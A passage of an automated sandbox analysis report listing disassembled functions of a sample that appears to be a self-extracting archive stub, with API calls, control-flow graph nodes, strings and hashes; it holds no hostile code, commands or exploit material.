                                                              • Instruction Fuzzy Hash: 0B3201B5A00218ABDF24EF69C842BEA77A4FF08704F40455BFD0597281E7B9ADC5CB58
                                                              Function 0042D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0042B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0042B579
                                                                • Part of subcall function 0042B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042B58A
                                                                • Part of subcall function 0042B568: IsDialogMessageW.USER32(0001041E,?), ref: 0042B59E
                                                                • Part of subcall function 0042B568: TranslateMessage.USER32(?), ref: 0042B5AC
                                                                • Part of subcall function 0042B568: DispatchMessageW.USER32(?), ref: 0042B5B6
                                                              • GetDlgItem.USER32(00000068,0046FCB8), ref: 0042D4E8
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,0042AF07,00000001,?,?,0042B7B9,0044506C,0046FCB8,0046FCB8,00001000,00000000,00000000), ref: 0042D510
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0042D51B
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004435F4), ref: 0042D529
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0042D53F
                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0042D559
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0042D59D
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0042D5AB
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0042D5BA
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0042D5E1
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004443F4), ref: 0042D5F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                              • String ID: \
                                                              • API String ID: 3569833718-2967466578
                                                              • Opcode ID: 27d5a1923703a27a6e0caf81c2a37cea3854d816167cdccae29b53e07a3c07ea
                                                              • Instruction ID: c274534f3587fb14408b99b21f350d459826d95b599f69779bfc65932b20f390
                                                              • Opcode Fuzzy Hash: 27d5a1923703a27a6e0caf81c2a37cea3854d816167cdccae29b53e07a3c07ea
                                                              • Instruction Fuzzy Hash: 5831C671245382BBD301DF20AC4AF6B7FACEB82706F004929F59596191DB649A44C77E
                                                              Function 0042D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 813 42d78f-42d7a7 call 42ec50 816 42d9e8-42d9f0 813->816 817 42d7ad-42d7b9 call 433e13 813->817 817->816 820 42d7bf-42d7e7 call 42fff0 817->820 823 42d7f1-42d7ff 820->823 824 42d7e9 820->824 825 42d812-42d818 823->825 826 42d801-42d804 823->826 824->823 828 42d85b-42d85e 825->828 827 42d808-42d80e 826->827 829 42d810 827->829 830 42d837-42d844 827->830 828->827 831 42d860-42d866 828->831 832 42d822-42d82c 829->832 833 42d9c0-42d9c2 830->833 834 42d84a-42d84e 830->834 835 42d868-42d86b 831->835 836 42d86d-42d86f 831->836 837 42d81a-42d820 832->837 838 42d82e 832->838 839 42d9c6 833->839 834->839 840 42d854-42d859 834->840 835->836 841 42d882-42d898 call 41b92d 835->841 836->841 842 42d871-42d878 836->842 837->832 845 42d830-42d833 837->845 838->830 847 42d9cf 839->847 840->828 848 42d8b1-42d8bc call 41a231 841->848 849 42d89a-42d8a7 call 421fbb 841->849 842->841 843 42d87a 842->843 843->841 845->830 850 42d9d6-42d9d8 847->850 859 42d8d9-42d8dd 848->859 860 42d8be-42d8d5 call 41b6c4 848->860 849->848 858 42d8a9 849->858 851 42d9e7 850->851 852 42d9da-42d9dc 850->852 851->816 852->851 855 42d9de-42d9e1 ShowWindow 852->855 855->851 858->848 862 42d8e4-42d8e6 859->862 860->859 862->851 864 42d8ec-42d8f9 862->864 865 42d8fb-42d902 864->865 866 42d90c-42d90e 864->866 865->866 867 42d904-42d90a 865->867 868 42d910-42d919 866->868 869 42d925-42d944 call 42dc3b 866->869 867->866 870 42d97b-42d987 CloseHandle 867->870 868->869 877 42d91b-42d923 ShowWindow 868->877 869->870 883 42d946-42d94e 869->883 871 42d998-42d9a6 870->871 872 42d989-42d996 call 421fbb 870->872 871->850 876 42d9a8-42d9aa 871->876 872->847 872->871 876->850 880 42d9ac-42d9b2 876->880 877->869 880->850 882 42d9b4-42d9be 880->882 882->850 883->870 884 42d950-42d961 GetExitCodeProcess 883->884 884->870 885 42d963-42d96d 884->885 886 42d974 885->886 887 42d96f 885->887 886->870 887->886
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0042D7AE
                                                              • ShellExecuteExW.SHELL32(?), ref: 0042D8DE
                                                              • ShowWindow.USER32(?,00000000), ref: 0042D91D
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0042D959
                                                              • CloseHandle.KERNEL32(?), ref: 0042D97F
                                                              • ShowWindow.USER32(?,00000001), ref: 0042D9E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                              • String ID: .exe$.inf$PDGu<B$hB$rB
                                                              • API String ID: 36480843-1959456613
                                                              • Opcode ID: 8563462885c6d4404a1628e4532cc00467b70d111be788114e468abdaf84b2a4
                                                              • Instruction ID: 5513bbf4bf4887fb1e4af73a326b7a557cb692b22cf8d3af4d224fe8c02117f5
                                                              • Opcode Fuzzy Hash: 8563462885c6d4404a1628e4532cc00467b70d111be788114e468abdaf84b2a4
                                                              • Instruction Fuzzy Hash: 9C5106B0A043909AEB30AF24B8447AB7BE4AF45744F84042FF5C597291E7B9CD84CB5E
                                                              Function 0043A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 912 43a95b-43a974 913 43a976-43a986 call 43ef4c 912->913 914 43a98a-43a98f 912->914 913->914 921 43a988 913->921 915 43a991-43a999 914->915 916 43a99c-43a9c0 MultiByteToWideChar 914->916 915->916 918 43ab53-43ab66 call 42fbbc 916->918 919 43a9c6-43a9d2 916->919 922 43aa26 919->922 923 43a9d4-43a9e5 919->923 921->914 925 43aa28-43aa2a 922->925 926 43a9e7-43a9f6 call 442010 923->926 927 43aa04-43aa15 call 438e06 923->927 929 43aa30-43aa43 MultiByteToWideChar 925->929 930 43ab48 925->930 926->930 939 43a9fc-43aa02 926->939 927->930 940 43aa1b 927->940 929->930 933 43aa49-43aa5b call 43af6c 929->933 934 43ab4a-43ab51 call 43abc3 930->934 941 43aa60-43aa64 933->941 934->918 943 43aa21-43aa24 939->943 940->943 941->930 944 43aa6a-43aa71 941->944 943->925 945 43aa73-43aa78 944->945 946 43aaab-43aab7 944->946 945->934 947 43aa7e-43aa80 945->947 948 43ab03 946->948 949 43aab9-43aaca 946->949 947->930 950 43aa86-43aaa0 call 43af6c 947->950 951 43ab05-43ab07 948->951 952 43aae5-43aaf6 call 438e06 949->952 953 43aacc-43aadb call 442010 949->953 950->934 967 43aaa6 950->967 956 43ab41-43ab47 call 43abc3 951->956 957 43ab09-43ab22 call 43af6c 951->957 952->956 966 43aaf8 952->966 953->956 965 43aadd-43aae3 953->965 956->930 957->956 970 43ab24-43ab2b 957->970 969 43aafe-43ab01 965->969 966->969 967->930 969->951 971 43ab67-43ab6d 970->971 972 43ab2d-43ab2e 970->972 973 43ab2f-43ab3f WideCharToMultiByte 971->973 972->973 973->956 974 43ab6f-43ab76 call 43abc3 973->974 974->934
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00435695,00435695,?,?,?,0043ABAC,00000001,00000001,2DE85006), ref: 0043A9B5
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0043ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0043AA3B
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043AB35
                                                              • __freea.LIBCMT ref: 0043AB42
                                                                • Part of subcall function 00438E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0043CA2C,00000000,?,00436CBE,?,00000008,?,004391E0,?,?,?), ref: 00438E38
                                                              • __freea.LIBCMT ref: 0043AB4B
                                                              • __freea.LIBCMT ref: 0043AB70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: d87ad99f62cebd2f303a0336fb71b4dfbe9657ae5cc70f2d7258c7abe085508c
                                                              • Instruction ID: 7581443776c89096ca1562cfeb9a44d4cf583936840e4895a0937454065087d0
                                                              • Opcode Fuzzy Hash: d87ad99f62cebd2f303a0336fb71b4dfbe9657ae5cc70f2d7258c7abe085508c
                                                              • Instruction Fuzzy Hash: 4A513B72640212AFDB258F61CC41EBFB7AADB48710F25562EFE44D6240DB38EC60C65A
                                                              Function 00433B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 977 433b72-433b7c 978 433bee-433bf1 977->978 979 433bf3 978->979 980 433b7e-433b8c 978->980 981 433bf5-433bf9 979->981 982 433b95-433bb1 LoadLibraryExW 980->982 983 433b8e-433b91 980->983 986 433bb3-433bbc GetLastError 982->986 987 433bfa-433c00 982->987 984 433b93 983->984 985 433c09-433c0b 983->985 989 433beb 984->989 985->981 990 433be6-433be9 986->990 991 433bbe-433bd3 call 436088 986->991 987->985 988 433c02-433c03 FreeLibrary 987->988 988->985 989->978 990->989 991->990 994 433bd5-433be4 LoadLibraryExW 991->994 994->987 994->990
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00433C35,?,?,00472088,00000000,?,00433D60,00000004,InitializeCriticalSectionEx,00446394,InitializeCriticalSectionEx,00000000), ref: 00433C03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: 7bd092a813a2573ca79850f29edf268e4eb819821814b440e26e110606f5fcb3
                                                              • Instruction ID: 148c0969a80bef049415d08239393a85ec222b895ab0ee5407a9c9c0532409f5
                                                              • Opcode Fuzzy Hash: 7bd092a813a2573ca79850f29edf268e4eb819821814b440e26e110606f5fcb3
                                                              • Instruction Fuzzy Hash: 70113D35A04220A7CB218F589C4174AB764AF0AB72F111122F915FB390D774FF0086DD
                                                              Function 0042ABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 995 42abab-42abca GetClassNameW 996 42abf2-42abf4 995->996 997 42abcc-42abe1 call 421fbb 995->997 998 42abf6-42abf8 996->998 999 42abff-42ac01 996->999 1002 42abe3-42abef FindWindowExW 997->1002 1003 42abf1 997->1003 998->999 1002->1003 1003->996
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000050), ref: 0042ABC2
                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0042ABF9
                                                                • Part of subcall function 00421FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0041C116,00000000,.exe,?,?,00000800,?,?,?,00428E3C), ref: 00421FD1
                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0042ABE9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                              • String ID: @Ut$EDIT
                                                              • API String ID: 4243998846-2065656831
                                                              • Opcode ID: 0f828816c181e7fc835c70274381af973dfc6e091164fb96d17c1c8636822d98
                                                              • Instruction ID: 20d6499f0cfc6f19c5a5f38d8d80d136c4d35b2673aa2dc49e69365f559bed54
                                                              • Opcode Fuzzy Hash: 0f828816c181e7fc835c70274381af973dfc6e091164fb96d17c1c8636822d98
                                                              • Instruction Fuzzy Hash: 11F0823270027877DB206A25AC09F9B766C9B46B41F894026BE05E2184D7A8EA85C5BE
                                                              Function 0042AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0042081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00420836
                                                                • Part of subcall function 0042081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0041F2D8,Crypt32.dll,00000000,0041F35C,?,?,0041F33E,?,?,?), ref: 00420858
                                                              • OleInitialize.OLE32(00000000), ref: 0042AC2F
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0042AC66
                                                              • SHGetMalloc.SHELL32(00458438), ref: 0042AC70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                              • String ID: riched20.dll$3Qo
                                                              • API String ID: 3498096277-4232643773
                                                              • Opcode ID: 86d0e5278cc7144fe52b8fde347db20f192d30b9dd2bb517651d3de24e461667
                                                              • Instruction ID: ccb43da53d15e02ef1af46d96a72550fa964b6abee0dca553959e15ae43976dd
                                                              • Opcode Fuzzy Hash: 86d0e5278cc7144fe52b8fde347db20f192d30b9dd2bb517651d3de24e461667
                                                              • Instruction Fuzzy Hash: 9EF04471900119ABC710AFA9D8499DFFFFCEF84705F00402AA405A2201DB7856458BA5
                                                              Function 004198E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1008 4198e0-419901 call 42ec50 1011 419903-419906 1008->1011 1012 41990c 1008->1012 1011->1012 1013 419908-41990a 1011->1013 1014 41990e-41991f 1012->1014 1013->1014 1015 419921 1014->1015 1016 419927-419931 1014->1016 1015->1016 1017 419933 1016->1017 1018 419936-419943 call 416edb 1016->1018 1017->1018 1021 419945 1018->1021 1022 41994b-41996a CreateFileW 1018->1022 1021->1022 1023 4199bb-4199bf 1022->1023 1024 41996c-41998e GetLastError call 41bb03 1022->1024 1025 4199c3-4199c6 1023->1025 1028 4199c8-4199cd 1024->1028 1033 419990-4199b3 CreateFileW GetLastError 1024->1033 1027 4199d9-4199de 1025->1027 1025->1028 1031 4199e0-4199e3 1027->1031 1032 4199ff-419a10 1027->1032 1028->1027 1030 4199cf 1028->1030 1030->1027 1031->1032 1034 4199e5-4199f9 SetFileTime 1031->1034 1035 419a12-419a2a call 420602 1032->1035 1036 419a2e-419a39 1032->1036 1033->1025 1037 4199b5-4199b9 1033->1037 1034->1032 1035->1036 1037->1025
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00417760,?,00000005,?,00000011), ref: 0041995F
                                                              • GetLastError.KERNEL32(?,?,00417760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0041996C
                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00417760,?,00000005,?), ref: 004199A2
                                                              • GetLastError.KERNEL32(?,?,00417760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004199AA
                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00417760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004199F9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: 36702e8be7b6738d5fe94d7f20d3bf43db97f951f89ba448c64334b4f7e2048f
                                                              • Instruction ID: 4f11f22bfbad2ad49b656ae999592567f164cb4c1b4ff374200f9da12dac07c8
                                                              • Opcode Fuzzy Hash: 36702e8be7b6738d5fe94d7f20d3bf43db97f951f89ba448c64334b4f7e2048f
                                                              • Instruction Fuzzy Hash: 053102B05447456FE7209F24CC46BDABB98BB05324F240B1EF9A1963D1D3A8AD84CB99
                                                              Function 0042B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1067 42b568-42b581 PeekMessageW 1068 42b583-42b597 GetMessageW 1067->1068 1069 42b5bc-42b5be 1067->1069 1070 42b5a8-42b5b6 TranslateMessage DispatchMessageW 1068->1070 1071 42b599-42b5a6 IsDialogMessageW 1068->1071 1070->1069 1071->1069 1071->1070
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0042B579
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042B58A
                                                              • IsDialogMessageW.USER32(0001041E,?), ref: 0042B59E
                                                              • TranslateMessage.USER32(?), ref: 0042B5AC
                                                              • DispatchMessageW.USER32(?), ref: 0042B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 1266772231-0
                                                              • Opcode ID: 8b775c821bd675a07ac94297ada6f94e035daf5e4d4b0c08924fbef7b375a82f
                                                              • Instruction ID: 2c4dcd33bb5c3348511b2b272bf7af3c4018899bab2f6561f9c0815f7ae477d8
                                                              • Opcode Fuzzy Hash: 8b775c821bd675a07ac94297ada6f94e035daf5e4d4b0c08924fbef7b375a82f
                                                              • Instruction Fuzzy Hash: E2F0D071A0126ABB8B209FE5EC4CDDB7FBCEE053967404425B909D2114EB38E645DBF8
                                                              Function 0042DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1072 42dbde-42dc09 call 42ec50 SetEnvironmentVariableW call 420371 1076 42dc0e-42dc12 1072->1076 1077 42dc36-42dc38 1076->1077 1078 42dc14-42dc18 1076->1078 1079 42dc21-42dc28 call 42048d 1078->1079 1082 42dc1a-42dc20 1079->1082 1083 42dc2a-42dc30 SetEnvironmentVariableW 1079->1083 1082->1079 1083->1077
                                                              APIs
                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0042DBF4
                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0042DC30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: sfxcmd$sfxpar
                                                              • API String ID: 1431749950-3493335439
                                                              • Opcode ID: c44160e836a74800adf3ea3a8f154f367da89f01ef1246921a45e83fc5a0fa6e
                                                              • Instruction ID: 1a5756eaeb0dd1dd6e94364a0befe59a88862eedb4ab5f0a6321d43167ac544c
                                                              • Opcode Fuzzy Hash: c44160e836a74800adf3ea3a8f154f367da89f01ef1246921a45e83fc5a0fa6e
                                                              • Instruction Fuzzy Hash: 7DF0EC72A0423467DF202FD7AC06BFB7798AF05B86B440457BD8596152D6B88D40D6BC
                                                              Function 00419785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1084 419785-419791 1085 419793-41979b GetStdHandle 1084->1085 1086 41979e-4197b5 ReadFile 1084->1086 1085->1086 1087 419811 1086->1087 1088 4197b7-4197c0 call 4198bc 1086->1088 1089 419814-419817 1087->1089 1092 4197c2-4197ca 1088->1092 1093 4197d9-4197dd 1088->1093 1092->1093 1094 4197cc 1092->1094 1095 4197df-4197e8 GetLastError 1093->1095 1096 4197ee-4197f2 1093->1096 1097 4197cd-4197d7 call 419785 1094->1097 1095->1096 1098 4197ea-4197ec 1095->1098 1099 4197f4-4197fc 1096->1099 1100 41980c-41980f 1096->1100 1097->1089 1098->1089 1099->1100 1102 4197fe-419807 GetLastError 1099->1102 1100->1089 1102->1100 1104 419809-41980a 1102->1104 1104->1097
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00419795
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004197AD
                                                              • GetLastError.KERNEL32 ref: 004197DF
                                                              • GetLastError.KERNEL32 ref: 004197FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
